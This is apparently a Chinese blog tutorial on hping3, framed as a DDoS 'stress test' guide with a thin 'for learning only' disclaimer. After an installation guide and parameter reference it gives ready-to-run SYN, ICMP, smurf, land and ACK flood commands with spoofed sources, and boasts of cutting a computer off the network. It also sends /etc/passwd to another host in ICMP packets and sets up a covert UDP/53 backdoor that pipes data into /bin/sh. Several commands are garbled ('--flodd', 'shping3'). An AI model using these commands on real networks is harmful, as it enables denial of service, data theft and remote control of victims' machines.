ddos网络压力测试工具
ICMP,SYN,TCP/UDP 数据发包
警告:该工具会造成非法行为,严禁商用!!!
仅共学习,网络了解
hping3是一个命令行下使用的,数据包组装/发包,分析工具,它还可以支持TCP、UDP、ICMP,syn和RAW-IP协议,它有一个路由跟踪模式,能够在两个相互包含的通道之间传送文件。hpin3常被用于检测网络和主机,其功能非常强大,可在多种操作系统下运行一款功能强大软件
开始安装
本次教程基于 kali
系统
因为kali软件源自带hping3工具
直接输入命令一键安装
apt-get install hping3
su - root
#切换到最高Root 环境变量用户
hping3 --help
#查看命令参考,出现则说明已安装成功
不想看参数,右边文章目录直接跳转到常用命令格式
基本参数
-c --count
发送数据包数量
-i --interval
发送数据包间隔的时间 (uX即X微秒,例如:-i u1000)
--fast
等同 -i u10000 (每秒10个包)
-D --debug
开启调试模式
-q --quiet
静默模式,最后再输出结果
-I --interface 接口名称
选择特定的网卡口
-V --verbose
开启详细格式输出
--faster
等同 -i u1000 (每秒100个包)
--flood
尽最快发送数据包,不显示回复
-n --numeric
数字化输出,象征性输出主机地址
-z --bind
绑定ctrl+z到ttl(默认为目的端口)
-Z --unbind
取消绑定ctrl+z键
--beep
对于接收到的每个匹配数据包蜂鸣声提示
模式参数
-0 --rawip
RAWIP模式,原始IP模式。在此模式下HPING会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式
-1 --icmp
ICMP模式,此模式下HPING会发送IGMP应答报,可用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文
-2 --udp
UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,可用--baseport --destport --keep选项指定其模式
-8 --scan
扫描模式 指定扫描对应的端口。 E.g. hping --scan 1-30,70-90 -S www.target.com
-9 --listen
IP参数
-a --spoof
源地址欺骗。伪造IP攻击,防火墙就不会记录真实IP,回应的包也接收不到
--rand-dest
随机目的地址模式。详细使用 man 命令
--rand-source
随机源地址模式。详细使用 man 命令
-t --ttl
修改 ttl 值 (默认 64)
-N --id
hping 中的 ID 值,缺省为随机值
-W --winid
使用window的字节序
-r --rel
更改ID,可以让ID呈递减输出
-f --frag
分片传输,可以测试对方碎片处理能力或绕过限制,缺省16字节
-x --morefrag
设置更多的分段标志,碎片攻击
-y --dontfrag
设置不分段标志。
-g --fragoff
设置偏移量。
-m --mtu
设置虚拟MTU值,当大于mtu的时候分段
-o --tos
tos字段,缺省0x00
-G --rroute
记录IP路由,并显示路由缓存
--lsrr
松散源路由并记录路由
--ssrr
严格源路由并记录路
-H --ipproto
设置IP协议字段,仅在RAW IP模式下使用
ICMP参数
-C --icmptype
icmp类型(默认echo请求)
-K --icmpcode
icmp代号(默认0)
--force-icmp
发送所有icmp类型(默认仅发送支持的类型) 强制ICMP类型
--icmp-gw
设置ICMP重定向网关地址(默认0.0.0.0)
--icmp-ts
等同 --icmp --icmptype 13 (ICMP 时间戳)
--icmp-addr
等同 --icmp --icmptype 17 (ICMP 地址子网掩码)
--icmp-help
显示icmp选项帮助
--icmp-ipver
设定IP头中的协议版本,默认是IPv4
--icmp-iphlen
设定IP头的长度
--icmp-iplen
设置IP头中的数据长度,默认为真是长度
--icmp-ipid
设置IP头中的id字段,默认随机
--icmp-ipproto
IP头中设置数据协议字段,默认是TCP
--icmp-cksum
设定ICMP校验和,默认是正确值
TCP/UDP参数
-s --baseport
缺省随机源端口
-p --destport
缺省随机目的端口
-k --keep
保持源端口
-w --win
滑动窗口大小(默认64)
-O --tcpoff
设置伪造tcp数据偏移量(取代tcp地址长度除4)
-Q --seqnum
仅显示tcp序列号
-b --badcksum
(尝试)发送具有错误IP校验和数据包
-M --setseq
设置TCP序列号
-L --setack
设置TCP的ack序号
-F --fin
FIN标志置一
-S --syn
SYN标志置一
-R --rst
RST标志置一
-P --push
PUSH标志置一
-A --ack
ACK标志置一
-U --urg
URG标志置一
-X --xmas
设定Xmas(0x40)标志位
-Y --ymas
设定Ymas(0x40)标志位
--tcpexitcode
使用last tcp-> th_flags作为退出码
--tcp-mss
启用具有给定值的TCP MSS选项
--tcp-timestamp
启用TCP时间戳选项来猜测HZ/uptime
通用设置
d --data 数据大小
设定发送数据包大小,默认是0
-E --file
文件数据
-e --sign
添加签名信息
-j --dump
转储为十六进制数据包
-J --print
转储为可打印字符
-B --safe
启用“安全”协议
-u --end
告诉你什么时候--file达到EOF并防倒回
-T --traceroute
traceroute模式(等同使用 --bind且--ttl 1)
--tr-stop
在traceroute模式下收到第一个不是ICMP时退出
--tr-keep-ttl
保持源TTL固定,仅用于监视一跳
--tr-no-rtt
不要在跟踪路由模式下计算/显示RTT信息 ARS包描述
--apd-send
发送APD描述数据包(参见docs /APD.txt)
常用命令格式
洪水疯狂发送包:--flodd
随机伪造IP:–rand-source
指定端口:-p 端口号
停止攻击:同时按住Ctrl+c键停止攻击
用如下打局域网下设备效果显著
hping3 -S -P -U --flood -V --rand-source 靶机IP
syn 洪水发包攻击
添加了flood参数,屏幕不会有提示用手机成功让电脑断网
ICMP洪水攻击
hping3 -1 -U --flood -V --rand-source 靶机IP
smurf 攻击 路由器
hping3 -1 -a --flodd -V 路由器IP 子网掩码/24
例子:
hping3 -1 -a --flodd -V 188.8.8.1 188.8.8.255
land 攻击 路由器
hping3 -S -a --flood -V 靶机IP 靶机IP
Land 攻击伪装成被攻击地址发送请求信息给被攻击地址本身
ack 攻击
hping3 -c 10000 -d 120 -A -w 64 -p 靶机端口 --flood --rand-source 靶机IP
以上5种命令攻击局域网效果显著
TCP 指定80端口攻击
hping3 靶机IP -p 80 -P --flood -V
UDP 指定445端口攻击
hping3 靶机IP -p 445 -S --flood -2 -V
发送指定数据包内容
echo "压力测试" >> test.txt
#创建一个包内容文件 test.txt
hping3 --flood -p 80 靶机IP -d 20 -E test.txt
#将指定数据包内容发送到靶机,默认TCP协议,目标端口80
-d 指定数据包大小
-E 指定发送的数据包内容
防火墙测试
hping3 --flood -S -c 1000000 -a 靶机IP -p 靶机端口 靶机IP
例:
hping3 --flood -S -c 1000000 -a 188.8.8.1 -p 80 188.8.8.1
指定各种数据包字段,依次对防火墙进行详细测试
测防火墙对ICMP包反应、是否支持traceroute、是否开放某端口、对防火墙进行拒绝服务攻击
发送源地址设置为与目标地址相同,诱使靶机与自己不停地建立连接
文件传输
hping3 靶机IP --listen signature --safe --icmp
借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现开启监听端口,对检测到签名(签名为用户指定的字符串)的内容进行相应解析在靶机接收端开启服务
shping3 靶机IP --icmp -d 100 --sign signature --file /etc/passwdhell
监听ICMP包中的签名,根据签名解析出文件内容。
在发送端
使用签名打包的ICMP包发送文件
将/etc/passwd密码文件通过ICMP包传给靶机。发送包大小为100字节(-d 100),发送签名为signature(-sign signature)
端口监听,系统后门
先打开53 UDP端口DNS解析服务
监听来自靶机包含签名为signature的数据包,将收到的数据调用/bin/sh执行
hping3 靶机IP --listen signature --safe --udp -p 53 | /bin/sh
#在靶机端口启动
echo id > test.cmd
#生成一个包含id 命令 test.cmd文件
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
#在本地端控制 发送shell id命令
将包含id命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
建立连接后打开shell通信
端口扫描
hping3 靶机IP --scan 1-100 --flood -S --spoof 60
————————————————
1 条评论
大佬,这留言好像就你自己看得见